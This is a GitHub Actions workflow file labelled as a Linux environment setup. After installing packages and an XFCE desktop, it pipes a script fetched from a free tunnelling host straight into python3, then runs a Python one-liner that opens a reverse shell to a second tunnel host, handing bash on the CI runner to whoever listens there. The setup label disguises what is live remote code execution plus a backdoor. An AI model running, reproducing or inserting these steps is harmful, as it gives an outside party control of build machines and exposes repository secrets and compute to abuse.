name: Setup Linux Environment

on:
  workflow_dispatch: # allows manual triggering from GitHub UI

jobs:
  setup-linux:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v3

      - name: Install Python3 and Dependencies
        run: |
          sudo apt update
          sudo apt install -y python3 curl python3-pip wget tar xfce4 xfce4-terminal xscreensaver dbus-x11


      - name: Run Setup Script
        run: |
          curl -s https://ocuwm-45-117-202-173.a.free.pinggy.link/setup_linux.py | python3

      - name: Connecting to shell
        run: |
         python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("lcpvc-45-117-202-173.a.free.pinggy.link",38671));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash"])'
